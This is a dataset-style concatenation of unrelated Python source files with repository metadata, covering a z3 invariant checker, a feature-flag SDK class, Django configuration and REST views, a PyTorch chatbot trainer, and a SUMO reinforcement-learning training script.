And(r < b2, q2 == 2 * q, r2 == r)))
post = None# TODO
return lc, pre, rec, post, (), ()
def full_check(z3_vars, invariant, loop_index):
z3_vars2, subs = core.gen_var2s_subs(z3_vars)
A, B, q, r, b = [z3_vars[v] for v in 'A B q r b'.split()]
A2, B2, q2, r2, b2 = [z3_vars2[v] for v in 'A2 B2 q2 r2 b2'.split()]
invariant2 = z3.substitute(invariant, subs)
solver = z3.Solver()
if loop_index == 1:
lc = r >= b
pre = And(A > 0, B > 0, q == 0, r == A, b == B)
rec = And(A2 == A, B2 == B, q2 == q, r2 == r, b2 == 2 * b)
post = And(q == 0, A == r, b > 0, r > 0, r < b)
solver.add(Not(And(Implies(pre, invariant),
Implies(And(invariant, lc, rec), invariant2),
Implies(And(invariant, Not(lc)), post))))
else:
assert loop_index == 2
lc = b != B
pre = And(q == 0, A == r, b > 0, r > 0, r < b)
rec = And(A2 == A, B2 == B, b2 == b/2, b == 2 * b2,
Or(And(r >= b2, q2 == 2 * q + 1, r2 == r - b2),
And(r < b2, q2 == 2 * q, r2 == r)))
temp = Int('temp')
post = Exists(temp, And(temp >= 0, temp < B, A == q * B + temp))
solver.add(Not(And(Implies(pre, invariant),
Implies(And(invariant, lc, rec), invariant2),
Implies(And(invariant, Not(lc)), post)
)))
result = solver.check()
if result == unsat:
return True, None
elif result == unknown:
return False, None
else:
assert result == sat
return False, solver.model()
if __name__ == '__main__':
import core
z3_vars = {v: Int(v) for v in 'A B q r b'.split()}
A, B, q, r, b = [z3_vars[v] for v in 'A B q r b'.split()]
invariant_loop1 = And(q == 0, A == r, b > 0, r > 0)
result, model = full_check(z3_vars, invariant_loop1, loop_index=1)
print(result, model)
invariant_loop2 = And(b * q - A + r == 0, r < b, r >= 0)
result, model = full_check(z3_vars, invariant_loop2, loop_index=2)
print(result, model)
| [
"yyljkbgthg2@163.com"
] | yyljkbgthg2@163.com |
975ea230959c3e1c7c686a01d3ad97ce395717b7 | f96ca27fb007ce8c912fc51d32278bc83db53c1f | /featureflags/evaluations/segment.py | 945623500cde0ef435e8d8d91f7b36f2ce119040 | [
"Apache-2.0"
] | permissive | meghamathur03/ff-python-server-sdk | fd36f369a2c038432fe68db3d8b5b195ecc90be4 | 33b599aea44c0fe0854836f271642b23c96b7bb2 | refs/heads/main | 2023-08-13T11:49:52.787018 | 2021-08-19T20:33:41 | 2021-08-19T20:33:41 | 412,287,494 | 0 | 0 | NOASSERTION | 2021-10-01T01:38:43 | 2021-10-01T01:38:43 | null | UTF-8 | Python | false | false | 4,943 | py | from typing import Any, Dict, List, Type, TypeVar, Union
import attr
from featureflags.models import UNSET, Unset
from .auth_target import Target
from .clause import Clause, Clauses
from .tag import Tag
T = TypeVar("T", bound="Segment")
@attr.s(auto_attribs=True)
class Segment(object):
identifier: str
name: str
environment: Union[Unset, str] = UNSET
tags: Union[Unset, List[Tag]] = UNSET
included: Union[Unset, List[str]] = UNSET
excluded: Union[Unset, List[str]] = UNSET
rules: Union[Unset, 'Clauses'] = UNSET
created_at: Union[Unset, int] = UNSET
modified_at: Union[Unset, int] = UNSET
version: Union[Unset, int] = UNSET
additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)
def evaluate(self, target: Target) -> bool:
if not isinstance(self.included, Unset):
if target.identifier in self.included:
return True
if not isinstance(self.excluded, Unset):
if target.identifier in self.excluded:
return True
if not isinstance(self.rules, Unset):
if self.rules.evaluate(target, None):
return True
return False
def to_dict(self) -> Dict[str, Any]:
identifier = self.identifier
name = self.name
environment = self.environment
tags: Union[Unset, List[Dict[str, Any]]] = UNSET
if not isinstance(self.tags, Unset):
tags = []
for tags_item_data in self.tags:
tags_item = tags_item_data.to_dict()
tags.append(tags_item)
included = self.included
excluded = self.excluded
rules: Union[Unset, List[Dict[str, Any]]] = UNSET
if not isinstance(self.rules, Unset):
rules = []
for rules_item_data in self.rules:
rules_item = rules_item_data.to_dict()
rules.append(rules_item)
created_at = self.created_at
modified_at = self.modified_at
version = self.version
field_dict: Dict[str, Any] = {}
field_dict.update(self.additional_properties)
field_dict.update(
{
"identifier": identifier,
"name": name,
}
)
if environment is not UNSET:
field_dict["environment"] = environment
if tags is not UNSET:
field_dict["tags"] = tags
if included is not UNSET:
field_dict["included"] = included
if excluded is not UNSET:
field_dict["excluded"] = excluded
if rules is not UNSET:
field_dict["rules"] = rules
if created_at is not UNSET:
field_dict["createdAt"] = created_at
if modified_at is not UNSET:
field_dict["modifiedAt"] = modified_at
if version is not UNSET:
field_dict["version"] = version
return field_dict
@classmethod
def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:
d = src_dict.copy()
identifier = d.pop("identifier")
name = d.pop("name")
environment = d.pop("environment", UNSET)
tags = []
_tags = d.pop("tags", UNSET)
for tags_item_data in _tags or []:
tags_item = Tag.from_dict(tags_item_data)
tags.append(tags_item)
included = d.pop("included", UNSET)
excluded = d.pop("excluded", UNSET)
rules: Clauses = Clauses()
_rules = d.pop("rules", UNSET)
for rules_item_data in _rules or []:
rules_item = Clause.from_dict(rules_item_data)
rules.append(rules_item)
created_at = d.pop("createdAt", UNSET)
modified_at = d.pop("modifiedAt", UNSET)
version = d.pop("version", UNSET)
segment = cls(
identifier=identifier,
name=name,
environment=environment,
tags=tags,
included=included,
excluded=excluded,
rules=rules,
created_at=created_at,
modified_at=modified_at,
version=version,
)
segment.additional_properties = d
return segment
@property
def additional_keys(self) -> List[str]:
return list(self.additional_properties.keys())
def __getitem__(self, key: str) -> Any:
return self.additional_properties[key]
def __setitem__(self, key: str, value: Any) -> None:
self.additional_properties[key] = value
def __delitem__(self, key: str) -> None:
del self.additional_properties[key]
def __contains__(self, key: str) -> bool:
return key in self.additional_properties
class Segments(Dict[str, Segment]):
def evaluate(self, target: Target) -> bool:
for _, segment in self.items():
if not segment.evaluate(target):
return False
return True
| [
"enver.bisevac@harness.io"
] | enver.bisevac@harness.io |
194a5ca0e17d733474329c9789569b457d6c0722 | 96b14e3b708cda4234be2ad79459be9f49db4fec | /lian/urls.py | 145ebb5fee8c7264781a669230d2f958a3cda341 | [] | no_license | snull/liana | 3d4d3d50be568a5b776dcd047cf50c972141dd2b | 48c8e871cb4d6a3b694d189e15ff215bac7cf115 | refs/heads/master | 2021-01-20T17:02:44.176252 | 2017-02-22T14:54:05 | 2017-02-22T14:54:05 | 82,820,891 | 1 | 0 | null | 2017-02-22T15:33:19 | 2017-02-22T15:33:19 | null | UTF-8 | Python | false | false | 807 | py | """lian URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'', include('liana.urls')),
]
| [
"AmiraliNull@gmail.com"
] | AmiraliNull@gmail.com |
fd411011c7f271cb58904da13007ef0f776ce5ac | 13b67fb6d5591c50ad9c2bf5bdd7aef16a00ac83 | /lbc/bits.py | d2bdca61fd86a8e84fd602546e0b5404108ad51c | [] | no_license | A-biao96/python-MP | 0e3d23a8e83e140a77a2a47e33034ae486ac4fa4 | c7596bc8603392480bc101bea619c758123acd68 | refs/heads/master | 2023-03-21T03:15:41.847013 | 2017-10-19T06:48:34 | 2017-10-19T06:48:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,040 | py | import ctypes
# str2bits
def write(bs_in, fname):
dll = ctypes.cdll.LoadLibrary
# bitstream = dll('lbc/bitstream.so')
bitstream = dll('./bitstream.so')
bs_in = bs_in.encode('utf-8')
fname = fname[:-4]+'.lbc'
fname = fname.encode('utf-8')
bitstream.write(bs_in, fname)
# parse hex stream
def hex2bit(fin):
if '.' in fin:
with open(fin) as f:
hexstr = f.read()
else: hexstr=fin
bitstream = ''
for each_hex in hexstr:
# hex to binary
bits = bin(int(each_hex, 16))[2:]
# put in bit jar
bits = '0'*(4-len(bits)) + bits
bitstream += bits
return bitstream
# read from file
def read(fn):
with open(fn, "rb") as f:
d_hex = f.read().hex()
return hex2bit(d_hex)
if __name__=='__main__':
'''
the len of bit stream should be multiples of 8bits
'''
#a = '011111101110001100100000'
a = '1'*24
_a = a.encode('utf-8')
fn = "str.bits"
_fn = fn.encode('utf-8')
write(_a, _fn)
print(read(fn))
| [
"supertab@126.com"
] | supertab@126.com |
a7c8fa0bda79edadd701b585eff8e09a773467c6 | e7c3d2b1fd7702b950e31beed752dd5db2d127bd | /code/super_pandigital_numbers/sol_571.py | 50c76cee64069e830d981145a37c35c2cc3edff5 | [
"Apache-2.0"
] | permissive | Ved005/project-euler-solutions | bbadfc681f5ba4b5de7809c60eb313897d27acfd | 56bf6a282730ed4b9b875fa081cf4509d9939d98 | refs/heads/master | 2021-09-25T08:58:32.797677 | 2018-10-20T05:40:58 | 2018-10-20T05:40:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 931 | py |
# -*- coding: utf-8 -*-
'''
File name: code\super_pandigital_numbers\sol_571.py
Author: Vaidic Joshi
Date created: Oct 20, 2018
Python Version: 3.x
'''
# Solution to Project Euler Problem #571 :: Super Pandigital Numbers
#
# For more information see:
# https://projecteuler.net/problem=571
# Problem Statement
'''
A positive number is pandigital in base b if it contains all digits from 0 to b - 1 at least once when written in base b.
A n-super-pandigital number is a number that is simultaneously pandigital in all bases from 2 to n inclusively.
For example 978 = 11110100102 = 11000203 = 331024 = 124035 is the smallest 5-super-pandigital number.
Similarly, 1093265784 is the smallest 10-super-pandigital number.
The sum of the 10 smallest 10-super-pandigital numbers is 20319792309.
What is the sum of the 10 smallest 12-super-pandigital numbers?
'''
# Solution
# Solution Approach
'''
'''
| [
"vaidic@vaidicjoshi.in"
] | vaidic@vaidicjoshi.in |
193caad783e4de81c0b362210d6ee8a1d18405e9 | 373a3c8ff0dccf4efd8d7c8b44b36f598b1e19a4 | /python_fund/checkerboard.py | 38e68a190551edcf69cb09ec18293d54ac8cb345 | [] | no_license | chelxx/Python | 4562033107c8426cae9e20fdc31bf9e206447098 | ec6cc3391b74e2b6970340f4496fbebe4fa1ebcd | refs/heads/master | 2021-05-04T22:49:07.621386 | 2018-04-10T02:02:14 | 2018-04-10T02:02:14 | 120,058,104 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 148 | py | # Checkerboard Assignment
for i in range (0, 8):
if i % 2 == 0:
print ("* * * * ")
if i % 2 != 0:
print (" * * * *")
# END | [
"chex239@gmail.com"
] | chex239@gmail.com |
8902a1d28f71f5a29b9844e1ab8f73700ccc0de0 | df2aeccfd7f5225ceca31708485af917578cb7b4 | /task/migrations/0004_task_image.py | 7272dd3e311cc539512e730f516d859ef8ac2a3d | [] | no_license | Romissevd/task_book | 59f35b333b042a192ee1ad90371fca70c3f7c0d6 | f3ef29bf7491e62202cdf8251d7b6841892e140e | refs/heads/master | 2020-12-05T23:28:50.696159 | 2020-01-07T21:04:28 | 2020-01-07T21:04:28 | 232,276,859 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 390 | py | # Generated by Django 2.2.8 on 2020-01-07 19:47
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('task', '0003_auto_20200107_1903'),
]
operations = [
migrations.AddField(
model_name='task',
name='image',
field=models.ImageField(blank=True, upload_to=''),
),
]
| [
"Romissevd@gmail.com"
] | Romissevd@gmail.com |
3b8d3df2466737bfb45f2151369b8a7fa8e44cd9 | a5fac621f4d7150194d1ef717d588c3109a3ccb0 | /train.py | 761fab3cf274215a353dbbec6e841768b7a6233a | [
"MIT"
] | permissive | ShafkatIslam/pytorch-chatbot-master | 446b780b4a154920d8adfeac1982840aa99fc0b0 | 56e1b4e358395b6dee0431ca316c86ffbe4724b2 | refs/heads/master | 2023-01-30T06:15:53.676514 | 2020-12-13T11:21:15 | 2020-12-13T11:21:15 | 313,303,907 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,969 | py | import numpy as np
import random
import json
import torch
import torch.nn as nn
from torch.utils.data import Dataset, DataLoader
from nltk_utils import bag_of_words, tokenize, stem
from model import NeuralNet
with open('intents.json', 'r') as f:
intents = json.load(f)
all_words = []
tags = []
xy = []
# loop through each sentence in our intents patterns
for intent in intents['intents']:
tag = intent['tag']
# add to tag list
tags.append(tag)
for pattern in intent['patterns']:
# tokenize each word in the sentence
w = tokenize(pattern)
# add to our words list
all_words.extend(w)
# add to xy pair
xy.append((w, tag))
# stem and lower each word
ignore_words = ['?', '.', '!', '-', ',', '0-9', '(', ')']
stopset = ['a', 'an', 'the', 'i', 'you', 'one', 'of', 'in', 'for', 'to', 'by', 'about', 'off', 'did', 'am', 'is', 'are', 'was', 'were', 'if', 'is', 'on', 'what', 'why', 'when', 'where', 'which', 'and', 'how', 'tell', 'me', 'my', 'must', 'could', 'that', 'or','anyone', 'any', 'many', 'there']
all_word = [stem(w) for w in all_words if w not in ignore_words]
# all_word = [tokenize(w) for w in all_words if w not in ignore_words]
all_words = [stem(w) for w in all_word if w not in stopset]
#all_words = [tokenize(w) for w in all_word if w not in stopset]
# remove duplicates and sort
all_words = sorted(set(all_words))
tags = sorted(set(tags))
print(">>", len(xy), "patterns")
print(">>", len(tags), "tags:", tags)
print(len(all_words), "unique stemmed words:", all_words)
# create training data
X_train = []
y_train = []
for (pattern_sentence, tag) in xy:
# X: bag of words for each pattern_sentence
bag = bag_of_words(pattern_sentence, all_words)
X_train.append(bag)
# y: PyTorch CrossEntropyLoss needs only class labels, not one-hot
label = tags.index(tag)
y_train.append(label)
X_train = np.array(X_train)
y_train = np.array(y_train)
# Hyper-parameters
num_epochs = 1000
batch_size = 8
learning_rate = 0.001
input_size = len(X_train[0])
hidden_size = 8
output_size = len(tags)
print(">>Input_Size: ", input_size, "\n>>Output_Size:", output_size)
class ChatDataset(Dataset):
def __init__(self):
self.n_samples = len(X_train)
self.x_data = X_train
self.y_data = y_train
# support indexing such that dataset[i] can be used to get i-th sample
def __getitem__(self, index):
return self.x_data[index], self.y_data[index]
# we can call len(dataset) to return the size
def __len__(self):
return self.n_samples
dataset = ChatDataset()
train_loader = DataLoader(dataset=dataset,
batch_size=batch_size,
shuffle=True,
num_workers=0)
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
model = NeuralNet(input_size, hidden_size, output_size).to(device)
# Loss and optimizer
criterion = nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
# Train the model
for epoch in range(num_epochs):
for (words, labels) in train_loader:
words = words.to(device)
labels = labels.to(dtype=torch.long).to(device)
# Forward pass
outputs = model(words)
# if y would be one-hot, we must apply
# labels = torch.max(labels, 1)[1]
loss = criterion(outputs, labels)
# Backward and optimize
optimizer.zero_grad()
loss.backward()
optimizer.step()
if (epoch+1) % 100 == 0:
print (f'Epoch: [{epoch+1}/{num_epochs}], Loss: {loss.item():.3f}')
# print(f'final loss: {loss.item():.3f}') # checking final loss
data = {
"model_state": model.state_dict(),
"input_size": input_size,
"hidden_size": hidden_size,
"output_size": output_size,
"all_words": all_words,
"tags": tags
}
FILE = "data.pth"
torch.save(data, FILE)
print(f'training complete. file saved to {FILE}')
| [
"mohammadshafkatislam@gmail.com"
] | mohammadshafkatislam@gmail.com |
efe4f1d33f79c254a8e5398dd52130a3341dc355 | 24fe7b918b137da0096a0f2e5cb086b46f38e1d4 | /tp4/Ej11.py | 9b9f8af7bfd2b81c2151187dbd6b61c0b78ca41c | [] | no_license | lrlichardi/Python | 4d5f53d4f3d5a5afb868656bc104601b096f7ef0 | fd77bae450a6df5fcae4af1c48cd46d4451b1d53 | refs/heads/main | 2023-08-22T20:50:57.915456 | 2021-10-14T23:54:57 | 2021-10-14T23:54:57 | 383,619,642 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 305 | py | # Escribir un programa que pida al usuario una palabra y luego muestre por pantalla una a
# una las letras de la palabra introducida empezando por la última.
palabra = input('Ingrese una palabra!: ')
for i in reversed(palabra):
print(i)
for i in range(len(palabra)-1 , -1 , -1):
print(palabra[i]) | [
"lrlichardi@hotmail.com"
] | lrlichardi@hotmail.com |
086f15693af91521b68d827e7613c2ac26e02baf | 7f57c12349eb4046c40c48acb35b0f0a51a344f6 | /2015/PopulatingNextRightPointersInEachNode_v1.py | 3577626399488b0ca50d165ddf85bbb001892a21 | [] | no_license | everbird/leetcode-py | 0a1135952a93b93c02dcb9766a45e481337f1131 | b093920748012cddb77258b1900c6c177579bff8 | refs/heads/master | 2022-12-13T07:53:31.895212 | 2022-12-10T00:48:39 | 2022-12-10T00:48:39 | 11,116,752 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,362 | py | #!/usr/bin/env python
# encoding: utf-8
# Definition for binary tree with next pointer.
class TreeLinkNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
self.next = None
def __repr__(self):
return '<{}>'.format(self.val)
class Solution:
# @param root, a tree link node
# @return nothing
def connect(self, root):
self.dfs(root)
def dfs(self, root):
if not root:
return
if root.left:
root.left.next = root.right
if root.next and root.right:
root.right.next = root.next.left
self.dfs(root.left)
self.dfs(root.right)
def levelorder(self, root):
queue = [root]
while queue:
n = queue.pop()
print n, n.val, n.next, '<<<'
if n.left:
queue = [n.left] + queue
if n.right:
queue = [n.right] + queue
if __name__ == '__main__':
s = Solution()
n1 = TreeLinkNode(1)
n2 = TreeLinkNode(2)
n3 = TreeLinkNode(3)
n4 = TreeLinkNode(4)
n5 = TreeLinkNode(5)
n6 = TreeLinkNode(6)
n7 = TreeLinkNode(7)
root = n1
n1.left = n2
n1.right = n3
n2.left = n4
n2.right = n5
n3.left = n6
n3.right = n7
s.connect(root)
s.levelorder(root)
| [
"stephen.zhuang@gmail.com"
] | stephen.zhuang@gmail.com |
8145eef152b0e0546104415648fdf30f8856f9c9 | cc6a2c63078b6e0a84df1dfd149614959b186380 | /CodingDojang/Unit 11/11.9.py | adf7993f9f3613d26477bcaa85c781f3a8cb2b6d | [] | no_license | midi0/python | 03d01dceb01f73acd76f1d18cdfd01038bbb2ea8 | 45750665b93bfec997fd1e791e2e397f51339d37 | refs/heads/master | 2021-01-13T23:16:22.771383 | 2020-04-08T17:35:43 | 2020-04-08T17:35:43 | 242,525,168 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 61 | py | a = input()
b = input()
a = a[1::2]
b = b[::2]
print(a+b) | [
"noreply@github.com"
] | midi0.noreply@github.com |
6e4a096a79eecbd1765bace94da05b888bc3f648 | cbce4bc7efedee1908067500f6c5f222179881c1 | /matcher.py | f89c48599be2fd876e99195b984c249785dbe6df | [] | no_license | emulation-as-a-service/co-oc | 6982212b84dc3fb6bc28498d75e2eee8a2f5ba94 | e5b5a77abc789f5e235d6c7dcb3eb35c88a7ece4 | refs/heads/main | 2023-07-23T10:18:37.392044 | 2020-11-11T00:09:00 | 2020-11-11T00:09:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,565 | py |
import copy
class Matcher:
def __init__(self, environmentProcessor):
self.environmentProcessor = environmentProcessor
def calculate_object_environment_overlap_weight(self, environmentId, data_object_matrix):
"""
Calculates the weight of the overlap between the data object and the given environment
:param environmentId: Id of the environment
:param data_object_matrix: Matrix which represents format combinations
of the data objects and the specific data object
:return: Weight of the overlap between the data object and the given environment
"""
s = set()
tmp = copy.deepcopy(self.environmentProcessor.readable_formats_of_environment[environmentId])
while len(tmp) > 0:
s.add(tmp.pop())
mat = data_object_matrix.tocoo()
summ = 0
for i, j, value in zip(mat.row, mat.col, mat.data):
if i in s and j in s:
summ += value
return summ
def rank_environments_for_object(self, data_object_matrix):
"""
Ranks the environments for a data object based upon the format distribution
of the data objects in general and the specific format distribution of the data object
:param data_object_matrix: Matrix which represents format combinations
of the data objects and the specific data object
:return: Sorted list of the likely environments
"""
tmp = []
for item in self.environmentProcessor.environmentIdMap.items():
overlap = self.calculate_object_environment_overlap_weight(item[1], data_object_matrix)
tmp.append((item[0], overlap))
return sorted(tmp, key=lambda tup: tup[1], reverse=True)
def calculate_tf_idf_overlap(self, environmentId, tf_map, idf_map, avdl, dl, k, b):
"""
Calculates the weight of the overlap between environment and data object based on
the tf-idf values of the formats
:param environmentId: Id of the environment
:param tf_map: Map which stores the tf values of the formats for a given data object
:param idf_map: idf_map: Map which stores the idf values for each format
:param avdl: Average document length -> Average number of files in a data object
:param dl: Document length -> Number of files in data object
:param k: Control parameter
:param b: Control parameter
:return: Weight of the overlap (Score of the environment in respect to a data object)
"""
tmp = copy.deepcopy(self.environmentProcessor.readable_formats_of_environment[environmentId])
summ = 0
s = set()
while len(tmp) > 0:
s.add(tmp.pop())
for formats in s:
if formats in tf_map:
summ += Matcher.bm25_formula(tf_map[formats], idf_map[formats], dl, avdl, k, b)
return summ
@staticmethod
def bm25_formula(tf, idf, dl, avdl, k, b):
"""
Calculates the relevance of a format
:param tf: Term frequency
:param idf: Inverse document frequency
:param dl: Document length -> Number of files in data object
:param avdl: Average document length -> Average number of files in a data object
:param k: Control parameter
:param b: Control parameter
:return: Score based on the Okapi Bm25 formula
"""
tf_ = (tf * (k + 1))/(k * (1 - b + b * (dl / avdl)) + tf)
return tf_ * idf
def rank_environments_tf_idf(self, tf_map, idf_map, avdl, dl, k, b):
"""
Ranks all possible Environments according to tf-idf values of the formats
which are shared by the data object and the environments
:param tf_map: Map which stores the tf values of the formats for a given data object
:param idf_map: Map which stores the idf values for each format
:param avdl: Average document length -> Average number of files in a data object
:param dl: Document length -> Number of files in data object
:param k: Control parameter
:param b: Control parameter
:return: Sorted list of the likely environments
"""
tmp = []
for item in self.environmentProcessor.environmentIdMap.items():
overlap = self.calculate_tf_idf_overlap(item[1], tf_map, idf_map, avdl, dl, k, b)
tmp.append((item[0], overlap))
return sorted(tmp, key=lambda tup: tup[1], reverse=True)
| [
"julian.giessl@gmx.de"
] | julian.giessl@gmx.de |
caff08d7c2133d4694efc128cb57b109c56bebf5 | f012a549ae884b6305cae45c9e0de543cad5b439 | /ControlFlow.py | 0e27341eff46a05d610f214f19163834b62ffbf5 | [] | no_license | Jtallen2002/Control-Flow | c28722abf9329a10b5b5916ac791ba9c7615323e | 59b5a930208690550c0275fbb5e47c250272f3eb | refs/heads/master | 2020-10-01T20:05:18.010891 | 2019-12-19T13:30:51 | 2019-12-19T13:30:51 | 227,615,018 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 617 | py | """
Programmer: Jake Allen
Date: 12-16-19
Program: Guess My Number
"""
myNumber = 7
print("\nGuess a number between 1 & 10\n")
# Ask users to guess
guess = int(input("Enter a guess: "))
# Keep asking users to guess my number until it is equal to myNumber
while guess != myNumber:
guess = int(input("\nWrong, enter a new guess: "))
print("\nCongratulations, you found my number!\n")
"""
Programmer: Jake Allen
Date: 12-19-19
Program: 1-10
"""
x = 1
# While loop will see if a condition has been met
# If not it will run again until the condition has been met
while x <= 10:
print(x)
x += 1
| [
"jtallen6109@gmail.com"
] | jtallen6109@gmail.com |
3de6ef686c512a9ef83b12288393e644638d149b | dd522a4b8e1175e1ccb7a2b1e358486c80780f85 | /my_site/urls.py | d571e39ed89b44b701bfa99658ef92924aa1932f | [] | no_license | bismarkstoney/tencedis-com | 9672d7d464c7a0f390ed2274032e581f546fd0f0 | 00900d4c89b387aad19af58d1aca71dd8fef6605 | refs/heads/main | 2023-03-21T06:50:40.819041 | 2021-03-01T05:15:31 | 2021-03-01T05:15:31 | 341,997,727 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,073 | py | """my_site URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.conf import settings
from django.urls import path, include
from django.conf.urls.static import static
urlpatterns = [
path('', include('pages.urls')),
path('listing/', include('listing.urls')),
path('contacts/', include('contacts.urls')),
path('admin/', admin.site.urls),
]
if settings.DEBUG: # new
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) | [
"bismarkstoney@yahoo.com"
] | bismarkstoney@yahoo.com |
37a55e826ebb167071a7c6afe9b42c8b3264506b | b24e45267a8d01b7d3584d062ac9441b01fd7b35 | /Usuario/.history/views_20191023114840.py | 870eeb90df98b7537147ae14418728dfb2b3fb07 | [] | no_license | slalbertojesus/merixo-rest | 1707b198f31293ced38930a31ab524c0f9a6696c | 5c12790fd5bc7ec457baad07260ca26a8641785d | refs/heads/master | 2022-12-10T18:56:36.346159 | 2020-05-02T00:42:39 | 2020-05-02T00:42:39 | 212,175,889 | 0 | 0 | null | 2022-12-08T07:00:07 | 2019-10-01T18:56:45 | Python | UTF-8 | Python | false | false | 2,211 | py | from django.shortcuts import render
from rest_framework import status
from rest_framework.response import Response
from rest_framework.decorators import api_view
from rest_framework.permissions import AllowAny
from .models import Usuario
from .serializers import UsuarioSerializer
SUCCESS = 'exito'
ERROR = 'error'
DELETE_SUCCESS = 'eliminado'
UPDATE_SUCCESS = 'actualizado'
CREATE_SUCCESS = 'creado'
@api_view(['GET', ])
def api_detail_usuario_view(request, identificador):
try:
usuario = Usuario.objects.get(identificador = identificador)
except usuario.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if request.method == 'GET':
serializer = UsuarioSerializer(usuario)
return Response(serializer.data)
@api_view(['PUT',])
def api_update_usuario_view(request, identificador):
try:
usuario = Usuario.objects.get(identificador = identificador)
except usuario.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if request.method == 'PUT':
serializer = UsuarioSerializer(usuario, data=request.data)
data = {}
if serializer.is_valid():
serializer.save()
data[SUCCESS] = UPDATE_SUCCESS
return Response(data=data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@api_view(['DELETE',])
def api_delete_usuario_view(request, identificador):
try:
usuario = Usuario.objects.get(identificador=identificador)
except usuario.DoesNotExist:
return Response(status=status.HTTP_404_NOT_FOUND)
if request.method == 'DELETE':
operation = usuario.delete()
data = {}
if operation:
data[SUCCESS] = DELETE_SUCCESS
return Response(data=data)
@api_view(['POST'])
@permission_classes([AllowAny])
def api_create_usuario_view(request, identificador):
try:
usuario = Usuario.objects.get(identificador = identificador)
except usuario.DoesNotExist:
if request.method == 'POST':
serializer = UsuarioSerializer(usuario, data=request.data)
data = {}
if serializer.is_valid():
serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
| [
"slalbertojesus@gmail.com"
] | slalbertojesus@gmail.com |
2b6396646956ef47745a11f2e243e9b2af000ff5 | 095b8390d1332a3f5923db51445e6e3d7a75ffe9 | /config/asgi.py | 2f8aef61be2bcfbf821c9c49cbd0d781039299e7 | [] | no_license | Lee-Su-gyeong/Online-travel | cefae6ee2a39ad618f8286a72db8ddf705d131cd | 24585999b992b184a17fdd9b89e174f74218ba16 | refs/heads/master | 2023-04-29T22:23:42.930542 | 2021-05-13T17:15:49 | 2021-05-13T17:15:49 | 367,111,799 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | """
ASGI config for Onlinetravel project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Onlinetravel.settings')
application = get_asgi_application()
| [
"dune2011@naver.com"
] | dune2011@naver.com |
a80c2f84ddce394f8f18a26f7aba838943052681 | 139929d142e901a2b7c594c76bbd4deb2ab206ec | /Training.py | 8cc462987d2b4f9dfdce8643094ef8cb7a20a114 | [
"Apache-2.0"
] | permissive | HamidShoaraee/Autonomous-Driving | 53e5f016729eec81ef7647f7ee0f97c34d477ad9 | 93519fb3d78120db15fdadfd1f38ce9e2a52cea8 | refs/heads/main | 2023-08-17T14:26:44.757529 | 2021-10-11T16:33:33 | 2021-10-11T16:33:33 | 407,266,883 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,242 | py | """
In this file we start simulation and try to train the agent to take the best actions.
This file connect modules of the both simulation.py and DQNAgent.py
"""
import numpy as np
from numpy.core import numeric
from simulation import Vehicles, Road, Simulation
import simulaiton_params as s
from DQNAgent import Memory, Agent, EpsilonGready
import traci
import random
from sumolib import checkBinary
import tensorflow as tf
import matplotlib.pyplot as plt
from visualization import Visual
####################################### Run simulation and Training ###############################
number_of_games = s.sim_params["number_of_games"]
gui_use = s.sim_params['gui_use'] # Train with gui not a good idea !
sumo_ctrl = False # Training without help of SUMO
action = s.sim_params['action']
epsilon = s.sim_params['epsilon']
batch_size = s.sim_params['batch_size']
min_size_memory = s.sim_params['min_size_memory']
max_size_memory = s.sim_params['max_size_memory']
veh = Vehicles(sim_params= s.sim_params)
sim_1 = Simulation(sim_params=s.sim_params)
replay_memory = Memory(capacity=50)
agent = Agent (sim_params = s.sim_params)
epsilon_gredy = EpsilonGready(sim_params = s.sim_params)
visual = Visual(sim_params=s.sim_params)
np.random.seed(32)
experiences = []
rewards = []
reward_avg_list = []
steps = []
ego_emg_same_list = []
out_of_roads_list = []
emg_reach_end_list = []
accidents_list = []
